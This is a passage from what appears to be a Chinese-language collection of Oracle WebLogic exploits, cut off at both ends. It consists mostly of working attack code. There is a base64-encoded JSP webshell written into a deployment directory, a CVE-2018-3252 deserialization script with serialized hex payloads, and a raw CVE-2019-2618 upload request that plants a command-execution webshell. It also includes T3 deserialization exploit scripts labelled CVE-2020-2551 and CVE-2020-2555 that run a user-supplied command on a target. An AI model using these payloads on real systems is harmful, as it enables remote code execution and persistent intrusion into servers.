<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshells.jsp</string>
91
</void>
92
</array>
93
<void method="start"/></void>
94
</work:WorkContext>
95
</soapenv:Header>
96
<soapenv:Body>
97
<asy:onAsyncDelivery/>
98
</soapenv:Body></soapenv:Envelope>"""
99
    obj=Weblogic(headers=headers,data=data,path=path)
100
    obj.djc(sys.argv[1])

CVE-2018-3252

version

1
10.3.6.0版本,
2
12.1.3.0版本,
3
12.2.1.3版本

检测

需要账号密码。防止部署war包容易被发现

1
#!/usr/bin/env python
2
# -*- coding: utf-8 -*- 
3
import requests
4
import re
5
import sys
6
7
def payload_module():
8
    #calc
9
    #payload = "737200176A6176612E7574696C2E4C696E6B656448617368536574D86CD75A95DD2A1E02000077020000787200116A6176612E7574696C2E48617368536574BA44859596B8B734030000770200007870770C000000103F400000000000027372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000849000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785A00155F75736553657276696365734D656368616E69736D4C000B5F617578436C617373657374003B4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B77020000787000000000FFFFFFFF0070757200035B5B424BFD19156767DB3702000077020000787000000002757200025B42ACF317F8060854E00200007702000078700000069ACAFEBABE0000003200390A0003002207003707002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100116A6176612F6C616E672F52756E74696D6507002A01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C002C002D0A002B002E01000863616C632E65786508003001000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003200330A002B003401000D537461636B4D61705461626C6501001C79736F73657269616C2F50776E65723132353836353535383033373001001E4C79736F73657269616C2F50776E6572313235383635353538303337303B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002E000E0000000C000100000005000F003800000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000033000E00000020000300000001000F0038000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000037000E0000002A000400000001000F003800000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C00000024000300020000000FA70003014CB8002F1231B6003557B1000000010036000000030001030002002000000002002100110000000A000100020023001000097571007E000C000001D4CAFEBABE00000032001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003B000E0000000C000100000005000F001200000002001300000002001400110000000A000100020016001000097074000450776E727077010078737D00000001001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C6174657377020000787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B7702000078707372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B770200007870737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C647702000078703F4000000000000C77080000001000000001740008663561356136303871007E0009787672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573000000000000000000000077020000787078"
10
    whoami
11
    payload = "737200176A6176612E7574696C2E4C696E6B656448617368536574D86CD75A95DD2A1E02000077020000787200116A6176612E7574696C2E48617368536574BA44859596B8B734030000770200007870770C000000103F400000000000027372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000849000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785A00155F75736553657276696365734D656368616E69736D4C000B5F617578436C617373657374003B4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B77020000787000000000FFFFFFFF0070757200035B5B424BFD19156767DB3702000077020000787000000002757200025B42ACF317F8060854E002000077020000787000000698CAFEBABE0000003200390A0003002207003707002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100116A6176612F6C616E672F52756E74696D6507002A01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C002C002D0A002B002E01000677686F616D6908003001000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003200330A002B003401000D537461636B4D61705461626C6501001C79736F73657269616C2F50776E65723632353135343430393532373501001E4C79736F73657269616C2F50776E6572363235313534343039353237353B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002E000E0000000C000100000005000F003800000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000033000E00000020000300000001000F0038000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000037000E0000002A000400000001000F003800000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C00000024000300020000000FA70003014CB8002F1231B6003557B1000000010036000000030001030002002000000002002100110000000A000100020023001000097571007E000C000001D4CAFEBABE00000032001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003B000E0000000C000100000005000F001200000002001300000002001400110000000A000100020016001000097074000450776E727077010078737D00000001001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C6174657377020000787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B7702000078707372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B770200007870737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C647702000078703F4000000000000C77080000001000000001740008663561356136303871007E0009787672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573000000000000000000000077020000787078";
12
    return payload.decode('hex')
13
14
def send_request(target,username,password):
15
    target = target + "/bea_wls_deployment_internal/DeploymentService"
16
    header_dict = {
17
        'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
18
        "wl_request_type":"data_transfer_request",
19
        "username": username,
20
        "password": password,
21
        "deployment_request_id": "108911",
22
        "serverName": "topsec"
23
    }
24
    try:
25
        request = requests.get(target)
26
        if request.status_code == 404:
27
            exit("{} - 404 not found".format(target))
28
        else:
29
            print "\n[*] Start detecting vulnerabilities...\n"
30
            results = requests.post(target, data=payload_module(), headers=header_dict).text
31
            print results
32
            c = re.findall(r'to (.+?)"',results)
33
            if len(c):
34
                if c[0] == "weblogic.deploy.service.DataTransferRequest":
35
                    print "[+] {} - exists CVE-2018-3252".format(target)
36
            else:
37
                print "[-] {} - don't exists CVE-2018-3252".format(target)
38
    except requests.ConnectionError:
39
        exit("[-] Cannot connect url: {}".format(target))
40
41
if __name__ == '__main__':
42
    if len(sys.argv) < 2:
43
        print "\n\tWebLogic DeploymentService 反序列化漏洞检测工具"
44
        print "\t\t\tCVEID: CVE-2018-3252"
45
        print "\nUsage: python CVE-2018-3252 http://localhost:7001 username password"
46
        exit(-1)
47
    else:
48
        target = sys.argv[1]
49
        username = sys.argv[2]
50
        password = sys.argv[3]
51
        send_request(target,username,password)

Weblogic 任意文件上传漏洞 (需要账户密码)(cve-2019-2618)

veriosn

1
10.3.6.0
2
12.1.3.0
3
12.2.1.3

利用

知道账号密码

1
POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
2
Host: 192.168.119.130:7001
3
Connection: close
4
Accept-Encoding: gzip, deflate
5
Accept: */*
6
User-Agent: python-requests/2.21.0
7
username: weblogic
8
wl_request_type: app_upload
9
cache-control: no-cache
10
wl_upload_application_name: /../tmp/_WL_internal/bea_wls_internal/9j4dqk/war
11
serverName: weblogic
12
password: yourpassword
13
content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
14
archive: true
15
server_version: 10.3.6.0
16
wl_upload_delta: true
17
Content-Length: 1081
18
19
------WebKitFormBoundary7MA4YWxkTrZu0gW
20
Content-Disposition: form-data; name="shell.jsp"; filename="shell.jsp"
21
Content-Type: false
22
23
<%@ page import="java.util.*,java.io.*"%>
24
<%
25
%>
26
<HTML><BODY>
27
Commands with JSP
28
<FORM METHOD="GET" NAME="myform" ACTION="">
29
<INPUT TYPE="text" NAME="cmd">
30
<INPUT TYPE="submit" VALUE="Send">
31
</FORM>
32
<pre>
33
<%
34
if (request.getParameter("cmd") != null) {
35
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
36
    Process p;
37
    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
38
        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
39
    }
40
    else{
41
        p = Runtime.getRuntime().exec(request.getParameter("cmd"));
42
    }
43
    OutputStream os = p.getOutputStream();
44
    InputStream in = p.getInputStream();
45
    DataInputStream dis = new DataInputStream(in);
46
    String disr = dis.readLine();
47
    while ( disr != null ) {
48
    out.println(disr);
49
    disr = dis.readLine();
50
    }
51
}
52
%>
53
</pre>
54
</BODY></HTML> 
55
56
------WebKitFormBoundary7MA4YWxkTrZu0gW--

Weblogic IIOP 反序列化漏洞检测脚本(cve-2020-2551)

version

1
10.3.6.0.0
2
12.1.3.0.0
3
12.2.1.3.0
4
12.2.1.4.0

检测

1
#!/usr/bin/python
2
# -*- coding: utf-8 -*-
3
# from:https://github.com/zhzyker/exphub
4
5
import socket
6
import time
7
import ssl
8
import binascii
9
import urlparse
10
import argparse
11
import sys
12
13
14
globalProxies = {}
15
header = {
16
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"
17
    }
18
19
def parseUrl(url):
20
    parsed = urlparse.urlparse(url)
21
    proto = parsed.scheme
22
    netloc = parsed.netloc
23
    ip = netloc
24
    if proto == 'http':
25
        port = 80
26
    else:
27
        port = 443
28
29
    if (':' in netloc):
30
        ip = netloc.split(':')[0]
31
        port = netloc.split(':')[1]
32
33
    uri = parsed.path
34
    return (proto, ip, port, uri)
35
36
37
def CVE_2020_2555(cmd):
38
    payload_start = 'aced00057372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573736167657400124c6a6176612f6c616e672f537472696e673b5b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0008707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000037372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000004374002079736f73657269616c2e7061796c6f6164732e4356455f323032305f323535357400124356455f323032305f323535352e6a6176617400096765744f626a6563747371007e000b0000000171007e000d71007e000e71007e000f7371007e000b0000002274001979736f73657269616c2e47656e65726174655061796c6f616474001447656e65726174655061796c6f61642e6a6176617400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00077872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e001a7873720024636f6d2e74616e676f736f6c2e7574696c2e66696c7465722e4c696d697446696c74657299022596d7b4595302000649000b6d5f635061676553697a654900076d5f6e506167654c000c6d5f636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b4c00086d5f66696c74657274001a4c636f6d2f74616e676f736f6c2f7574696c2f46696c7465723b4c000f6d5f6f416e63686f72426f74746f6d71007e00014c000c6d5f6f416e63686f72546f7071007e0001787000000000000000007372002c636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e436861696e6564457874726163746f72889f81b0945d5b7f02000078720036636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374436f6d706f73697465457874726163746f72086b3d8c05690f440200015b000c6d5f61457874726163746f727400235b4c636f6d2f74616e676f736f6c2f7574696c2f56616c7565457874726163746f723b7872002d636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374457874726163746f72658195303e7238210200014900096d5f6e546172676574787000000000757200235b4c636f6d2e74616e676f736f6c2e7574696c2e56616c7565457874726163746f723b2246204735c4a0fe0200007870000000047372002d636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4964656e74697479457874726163746f72936ee080c7259c4b0200007871007e0022000000007372002f636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e5265666c656374696f6e457874726163746f72ee7ae995c02fb4a20200025b00096d5f616f506172616d7400135b4c6a6176612f6c616e672f4f626a6563743b4c00096d5f734d6574686f6471007e00057871007e002200000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65707400096765744d6574686f647371007e0028000000007571007e002b000000027070740006696e766f6b657371007e0028000000007571007e002b0000000174'
39
    payload_lenhex = '{:04x}'.format(len(cmd))
40
    payload_cmdhex = binascii.b2a_hex(cmd)
41
    payload_end = '7400046578656370767200116a6176612e6c616e672e52756e74696d650000000000000000000000787070'
42
    payload = payload_start + payload_lenhex + payload_cmdhex + payload_end
43
    return payload
44
45
class payloadtest(object):
46
    def __init__(self):
47
48
        self.vuln = 'cve_2020_2555'
49
50
    def t3handshake(self,sock,server_addr):
51
        sock.connect(server_addr)
52
        sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
53
        time.sleep(1)
54
        data = sock.recv(1024)
55
        #print data
56
        #print 'handshake successful'
57
58
    def buildT3RequestObject(self,sock,port):
59
        data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
60
        data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b19ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'
61
        data3 = '1a7727000d3234322e323134'
62
        data4 = '2e312e32353461863d1d0000000078'
63
        for d in [data1,data2,data3,data4]:
64
            sock.send(d.decode('hex'))
65
        time.sleep(2)
66
        #print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
67
68
    def sendEvilObjData(self,sock,data):
69
        payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
70
        payload+=data
71
        payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
72
        payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
73
        sock.send(payload.decode('hex'))
74
        time.sleep(2)
75
        sock.send(payload.decode('hex'))
76
        res = ''
77
        n=1
78
        try:
79
            while True:
80
                n += 1
81
                res += sock.recv(4096)
82
                time.sleep(0.1)
83
                if(n>15):
84
                    break
85
        except Exception as e:
86
            pass
87
        return res
88
89
    def check(self, url, cmd,timeout, proxies=globalProxies, **args):
90
        (proto, ip, port, uri) = parseUrl(url)
91
92
        server_addr = (ip, int(port))
93
        if proto == 'https':
94
            sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
95
        else:
96
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
97
        sock.settimeout(timeout)
98
        try:
99
            self.t3handshake(sock,server_addr)
100
            self.buildT3RequestObject(sock,port)
101
            payload = CVE_2020_2555(cmd)
102
            resp = self.sendEvilObjData(sock,payload)
103
104
            print ('[+] Payload send succeed! Please check.')
105
106
            return True
107
        except Exception as e:
108
            print ('[-] Failed! Exception:{}'.format(str(e)))
109
110
        return False
111
112
def poc(url,cmd):
113
    x = payloadtest()
114
    return x.check(url, cmd,20)
115
116
117
if __name__ == '__main__':
118
    parser = argparse.ArgumentParser(description='Weblogic cve-2020-2555 Exp',
119
                                     usage='[*] use "python %(prog)s --help" for more information',
120
                                     formatter_class=argparse.RawTextHelpFormatter)
121
    parser.add_argument("-u", "--url",
122
                        dest="url",
123
                        help="the url to check"
124
                        )
125
126
    parser.add_argument("-c", "--cmd",
127
                        dest="cmd",
128
                        help="the cmd to run on the target"
129
                        )
130
    args = parser.parse_args()
131
    if not args.url or not args.cmd:
132
        sys.exit('[*] Please assign url and cmd! \n[*] Examples python cve-2020-2883_cmd.py -u http://127.0.0.1:7001 -c calc')
133
    poc(args.url, args.cmd)

Oracle Coherence 反序列化漏洞(CVE-2020-2555)

version

1
Oracle weblogic 12.1.3.0.0
2
Oracle weblogic 12.2.1.1.0
3
Oracle weblogic 12.2.1.2.0
4
Oracle weblogic 12.2.1.3.0
5
Oracle weblogic 12.2.1.4.0

利用

1
#!/usr/bin/python
2
# -*- coding: utf-8 -*-
3
# from:https://github.com/zhzyker/exphub
4
5
import socket
6
import time
7
import ssl
8
import binascii
9
import urlparse
10
import argparse
11
import sys
12
13
14
globalProxies = {}
15
header = {
16
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"
17
    }
18
19
def parseUrl(url):
20
    parsed = urlparse.urlparse(url)
21
    proto = parsed.scheme
22
    netloc = parsed.netloc
23
    ip = netloc
24
    if proto == 'http':
25
        port = 80
26
    else:
27
        port = 443
28
29
    if (':' in netloc):
30
        ip = netloc.split(':')[0]
31
        port = netloc.split(':')[1]
32
33
    uri = parsed.path
34
    return (proto, ip, port, uri)
35
36
37
def CVE_2020_2555(cmd):
38
